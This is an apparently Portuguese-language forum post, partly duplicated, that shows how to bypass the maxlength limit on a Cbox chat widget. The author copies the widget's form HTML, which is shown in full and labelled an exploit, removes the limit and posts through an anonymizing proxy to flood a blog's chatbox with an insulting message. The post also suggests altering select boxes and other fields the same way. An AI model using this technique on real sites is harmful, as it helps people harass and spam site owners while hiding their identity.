Não sei vocês, mas eu sempre tive uma queda por entrar com proxy naqueles sites de fundo preto com caveirinhas, geralmente do blogspot, que trazem no lado uma caixinha de chat do Cbox, para enviar mensagens como se fosse alguém desesperado, que não entende nada de informática, falando mal de hackers (como se lamers que ficam baixando esses programas o fossem), pedindo para pararem com isso. Porém, estas caixas possuem limite de caracteres.
Este limite é feito por um parâmetro na tag HTML chamado maxlength. É usado da seguinte maneira:
No exemplo acima criamos uma caixa de texto com um limite de 30 caracteres. Porém, há um mal nisso. Vamos voltar para aquela minha velha mania citada acima.
Por que eu gosto de fazer isso? Nem eu sei! Mas domingos eu estou à toa e vou fazer o quê para ocupar o tempo sem esquentar a cabeça? Além disso, rir faz bem à saúde. Vocês podem me ajudar em mais uma dessas?
Vou fazer desta vez com o blog Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., que distribui programas e trojans (em sua maioria, que não funcionam ou até trazem malwares) e forma cada dia mais novos lamers e script kiddies. Vocês já foram atacados por um deles? Eu não, mas quem já foi não deve ter achado legal aqueles pings da morte, aqueles floods no MSN, aqueles chatos. São as piores pragas do mundo. E o site ajuda usuários normais a se formarem em Técnico em Ciência da Lameação!!! Não quero isso. Quero chegar ileso destes ataques até os 60 anos. Então, vamos fazê-los se acharem o tal, e, ao ficarem se achando, perderem tempo nos ataques. Vamos mandar a seguinte mensagem:
Não é linda? Até me emociono... Peraí, alguém me dê um lenço?
Mas, voltando, este site permite no máximo 200 caracteres. Isto quer dizer que ele suportaria até "toma no". Então, criamos este exploit:
O que fizemos? Apenas copiamos o código da página e retiramos o maxlength. O único obstáculo do Cbox é este. Ao invés de usar uma função como a strlen() ou só configurar o MySQL, não. Depois, querem nos culpar pela insegurança. Ok, então, salvamos o arquivo em qualquer lugar (eu, por exemplo, salvei na área de trabalho como hahaha.htm), damos duplo clique e vemos o navegador abrindo nosso valente explorador. Agora, basta escrever sua mensagem, desrespeitando o limite, que não se aplicará e pronto. Abrirá em tela grande a página que o iFrame da página original linka. Agora, volte à página do site e veja que linda a sua mensagem com mais de 200 caracteres! Dá até vontade de chorar, né? Ou de floodar?
Agora, vamos trocar umas ideias (haha to pegando a nova ortografia). Você pode, por exemplo, modificar o tipo de input e trocar um selectbox limitado apenas às opções disponíveis por qual você quiser.
Lembrando que isto não ocorre em todos os sites. Só na maioria.
Note que no action está uma string em hex. É porque eu estava usando proxy, pois lamers não merecem ter meu IP.
Agora, o que vai ter de gente procurando o action do twitter! Nunca testei, mas para uma gigante, é normal ter mais uma proteção.
Até mais.
Este limite é feito por um parâmetro na tag HTML chamado maxlength. É usado da seguinte maneira:
Código HTML:
<input type="text" maxlength="30">
Por que eu gosto de fazer isso? Nem eu sei! Mas domingos eu estou à toa e vou fazer o quê para ocupar o tempo sem esquentar a cabeça? Além disso, rir faz bem à saúde. Vocês podem me ajudar em mais uma dessas?
Vou fazer desta vez com o blog Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., que distribui programas e trojans (em sua maioria, que não funcionam ou até trazem malwares) e forma cada dia mais novos lamers e script kiddies. Vocês já foram atacados por um deles? Eu não, mas quem já foi não deve ter achado legal aqueles pings da morte, aqueles floods no MSN, aqueles chatos. São as piores pragas do mundo. E o site ajuda usuários normais a se formarem em Técnico em Ciência da Lameação!!! Não quero isso. Quero chegar ileso destes ataques até os 60 anos. Então, vamos fazê-los se acharem o tal, e, ao ficarem se achando, perderem tempo nos ataques. Vamos mandar a seguinte mensagem:
pf vcs parem de ficar invadndo gent vcs hackers sao tudo fdp msm pra que invadi o q voc ganhar cum iso deixa agent em pas pare de fik invadind vcs naum tem medo de ser preso pelo fbi? vao tudo toma no *Censured* que *Censured*, voceis so invade vai trabalhar bando de *Censured* para de hackerar *Censured* deixa os computador em paz.
Mas, voltando, este site permite no máximo 200 caracteres. Isto quer dizer que ele suportaria até "toma no". Então, criamos este exploit:
Código HTML:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Cbox</title><link rel="stylesheet" type="text/css" href="http://anonsafe.com/index.php?q=c2JiYzovL3FxcS5wdE5nLnFoL2hiZmlLaC9yNGg1XzIucGho"> </head> <body class="fmbdy" > <form name="cbox" target="cboxmain" action="http://anonsafe.com/index.php?q=c2JiYzovL3FxcTYucHROZy5xaC90TmcvbEdRS2cuY3NjP3ROZ2xRPTI5MjQ4MCZ0Tmdieng9dmJqUWF5JmhLcD1oSXRNbGI%3D" method="post" class="cfrm"> <table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr><td> <a href="http://anonsafe.com/index.php?q=c2JiYzovL3FxcS5ocWxicHNHTlFLLnBOTS8%3D" target="_blank" title="Ad: Got notes? This revolutionary web app will organise them.">[Switchnode]</a></td> <td align="right"><a href="http://anonsafe.com/index.php?q=c2JiYzovL3FxcTYucHROZy5xaC90TmcvbEdRS2cuY3NjP3ROZ2xRPTI5MjQ4MCZ0Tmdieng9dmJqUWF5JmhLcD1NemxH" target="cboxmain" id="rf">Actualizar</a> </td> </tr><tr> <td colspan="2" height="100%" id="tblmid" align="center" valign="top"> <input type="hidden" name="key" value=""> <input type="text" maxlength="25" name="nme" autocomplete="off" size="9" value="Nome" class="frmtb" ><input type="text" maxlength="100" name="eml" size="9" value="E-mail / url" class="frmtb" > <input type="text" name="pst" autocomplete="off" size="9" value="Mensagem" class="frmtb" ><input type="submit" value="Enviar" name="sub" class="frmbtn"></td></tr> <tr><td align="center" colspan="2"> <div align="right"> <a href="http://anonsafe.com/index.php?q=c2JiYzovL3FxcTYucHROZy5xaC90TmcvT3pyelRwdmxjYjpjTmMoJ3NLaWMnLCAzMjAsIDMwMCwgMSk%3D">Ajuda</a> <span class="lnk">·</span> <a href="http://anonsafe.com/index.php?q=c2JiYzovL3FxcTYucHROZy5xaC90TmcvT3pyelRwdmxjYjpjTmMoJ2hNbGlsS2gnLCA0ODAsIDMyMCwgMSk%3D">Sorrisos</a> <span class="lnk">·</span> <a href="http://anonsafe.com/index.php?q=c2JiYzovL3B0TmcucWgvP3Y9Ni0yOTI0ODA%3D" target="_blank" title="Adquira o seu pr�prio Cbox gratuitamente para o seu site!">Cbox</a></div></td></tr> </table> </form> <!-- exec: 1.22ms. queries: 1 --> </body></html>
Agora, vamos trocar umas ideias (haha to pegando a nova ortografia). Você pode, por exemplo, modificar o tipo de input e trocar um selectbox limitado apenas às opções disponíveis por qual você quiser.
Lembrando que isto não ocorre em todos os sites. Só na maioria.
Note que no action está uma string em hex. É porque eu estava usando proxy, pois lamers não merecem ter meu IP.
Agora, o que vai ter de gente procurando o action do twitter! Nunca testei, mas para uma gigante, é normal ter mais uma proteção.
Até mais.
Comment